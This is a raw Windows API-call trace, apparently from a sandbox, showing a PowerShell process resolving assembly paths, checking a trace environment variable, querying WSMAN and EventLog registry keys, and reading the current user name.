	[0146.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0146.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0146.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0147.110] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.110] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.112] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.112] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.114] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.114] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.116] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.116] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.130] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.130] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.131] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.132] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.132] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.132] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.138] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd098 | out: phkResult=0x1cd098*=0x320) returned 0x0
	[0147.140] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccf9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccf9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.140] CoTaskMemFree (pv=0x0) 
	[0147.141] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.141] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x3e4db0, lpcchValueName=0x1cd048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0147.141] CoTaskMemFree (pv=0x3e4db0) 
	[0147.141] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.141] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x3e4db0, lpcchValueName=0x1cd048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0147.141] CoTaskMemFree (pv=0x3e4db0) 
	[0147.141] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.141] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x3e4db0, lpcchValueName=0x1cd048, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd048, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0147.141] CoTaskMemFree (pv=0x3e4db0) 
	[0147.141] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd02c, lpData=0x0, lpcbData=0x1cd028*=0x0 | out: lpType=0x1cd02c*=0x1, lpData=0x0, lpcbData=0x1cd028*=0x8) returned 0x0
	[0147.142] CoTaskMemAlloc (cb=0xc) returned 0x1b7df5a0
	[0147.142] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ccffc, lpData=0x1b7df5a0, lpcbData=0x1ccff8*=0x8 | out: lpType=0x1ccffc*=0x1, lpData="2.0", lpcbData=0x1ccff8*=0x8) returned 0x0
	[0147.142] CoTaskMemFree (pv=0x1b7df5a0) 
	[0147.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccfe8 | out: phkResult=0x1ccfe8*=0x324) returned 0x0
	[0147.421] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cceec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccee8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cceec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccee8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.421] CoTaskMemFree (pv=0x0) 
	[0147.421] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.421] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3e4db0, lpcchValueName=0x1ccf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ccf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0147.421] CoTaskMemFree (pv=0x3e4db0) 
	[0147.421] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.421] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3e4db0, lpcchValueName=0x1ccf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ccf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0147.421] CoTaskMemFree (pv=0x3e4db0) 
	[0147.421] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.421] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x3e4db0, lpcchValueName=0x1ccf98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ccf98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0147.421] CoTaskMemFree (pv=0x3e4db0) 
	[0147.421] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ccf7c, lpData=0x0, lpcbData=0x1ccf78*=0x0 | out: lpType=0x1ccf7c*=0x1, lpData=0x0, lpcbData=0x1ccf78*=0x8) returned 0x0
	[0147.421] CoTaskMemAlloc (cb=0xc) returned 0x1b7df4c0
	[0147.421] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ccf4c, lpData=0x1b7df4c0, lpcbData=0x1ccf48*=0x8 | out: lpType=0x1ccf4c*=0x1, lpData="2.0", lpcbData=0x1ccf48*=0x8) returned 0x0
	[0147.421] CoTaskMemFree (pv=0x1b7df4c0) 
	[0147.423] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.423] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.428] CoTaskMemAlloc (cb=0x104) returned 0x1b7da8b0
	[0147.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.428] CoTaskMemFree (pv=0x1b7da8b0) 
	[0147.434] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd018 | out: phkResult=0x1cd018*=0x33c) returned 0x0
	[0147.673] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccf8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccf8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.673] CoTaskMemFree (pv=0x0) 
	[0147.674] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.674] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.674] CoTaskMemFree (pv=0x3e4db0) 
	[0147.674] CoTaskMemFree (pv=0x0) 
	[0147.674] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.674] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.674] CoTaskMemFree (pv=0x3e4db0) 
	[0147.674] CoTaskMemFree (pv=0x0) 
	[0147.674] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.674] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.674] CoTaskMemFree (pv=0x3e4db0) 
	[0147.674] CoTaskMemFree (pv=0x0) 
	[0147.674] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.675] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.675] CoTaskMemFree (pv=0x3e4db0) 
	[0147.675] CoTaskMemFree (pv=0x0) 
	[0147.675] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.675] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.675] CoTaskMemFree (pv=0x3e4db0) 
	[0147.675] CoTaskMemFree (pv=0x0) 
	[0147.675] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.675] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.675] CoTaskMemFree (pv=0x3e4db0) 
	[0147.675] CoTaskMemFree (pv=0x0) 
	[0147.675] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.675] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.675] CoTaskMemFree (pv=0x3e4db0) 
	[0147.675] CoTaskMemFree (pv=0x0) 
	[0147.675] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.675] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.675] CoTaskMemFree (pv=0x3e4db0) 
	[0147.675] CoTaskMemFree (pv=0x0) 
	[0147.675] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.675] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x3e4db0, lpcchName=0x1cd018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0147.675] CoTaskMemFree (pv=0x3e4db0) 
	[0147.676] CoTaskMemFree (pv=0x0) 
	[0147.676] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x344) returned 0x0
	[0147.676] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.676] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x31c) returned 0x0
	[0147.676] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.676] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x34c) returned 0x0
	[0147.676] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.676] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x350) returned 0x0
	[0147.676] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.676] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x354) returned 0x0
	[0147.677] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.677] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x358) returned 0x0
	[0147.677] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.677] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x35c) returned 0x0
	[0147.677] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.677] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x360) returned 0x0
	[0147.677] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x0) returned 0x2
	[0147.677] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x364) returned 0x0
	[0147.677] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd078 | out: phkResult=0x1cd078*=0x368) returned 0x0
	[0147.678] RegCloseKey (hKey=0x368) returned 0x0
	[0147.678] RegCloseKey (hKey=0x33c) returned 0x0
	[0147.678] RegCloseKey (hKey=0x364) returned 0x0
	[0147.694] CoTaskMemAlloc (cb=0x804) returned 0x1b7f6e40
	[0147.694] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7f6e40, nSize=0x1cd288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd288) returned 0x1
	[0147.696] CoTaskMemFree (pv=0x1b7f6e40) 
	[0147.697] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0147.697] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd2c8) returned 1
	[0147.697] CoTaskMemFree (pv=0x3e4db0) 
	[0148.028] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccfc8 | out: phkResult=0x1ccfc8*=0x36c) returned 0x0
	[0148.028] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.028] CoTaskMemFree (pv=0x0) 
	[0148.028] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.028] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.028] CoTaskMemFree (pv=0x3e4db0) 
	[0148.028] CoTaskMemFree (pv=0x0) 
	[0148.028] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.028] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.029] CoTaskMemFree (pv=0x3e4db0) 
	[0148.029] CoTaskMemFree (pv=0x0) 
	[0148.029] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.029] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.029] CoTaskMemFree (pv=0x3e4db0) 
	[0148.029] CoTaskMemFree (pv=0x0) 
	[0148.029] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.029] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.138] CoTaskMemFree (pv=0x3e4db0) 
	[0148.138] CoTaskMemFree (pv=0x0) 
	[0148.138] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.138] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.138] CoTaskMemFree (pv=0x3e4db0) 
	[0148.138] CoTaskMemFree (pv=0x0) 
	[0148.139] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.139] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.139] CoTaskMemFree (pv=0x3e4db0) 
	[0148.139] CoTaskMemFree (pv=0x0) 
	[0148.139] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.139] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.139] CoTaskMemFree (pv=0x3e4db0) 
	[0148.139] CoTaskMemFree (pv=0x0) 
	[0148.139] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.139] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.139] CoTaskMemFree (pv=0x3e4db0) 
	[0148.139] CoTaskMemFree (pv=0x0) 
	[0148.139] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0148.139] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x3e4db0, lpcchName=0x1ccfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ccfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0148.139] CoTaskMemFree (pv=0x3e4db0) 
	[0148.139] CoTaskMemFree (pv=0x0) 
	[0148.139] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x370) returned 0x0
	[0148.139] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.139] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x374) returned 0x0
	[0148.139] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x378) returned 0x0
	[0148.140] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x37c) returned 0x0
	[0148.140] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x380) returned 0x0
	[0148.140] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
	[0148.140] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x384) returned 0x0
	[0148.140] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd028 | out: phkResult=0x1cd028*=0x0) returned 0x2
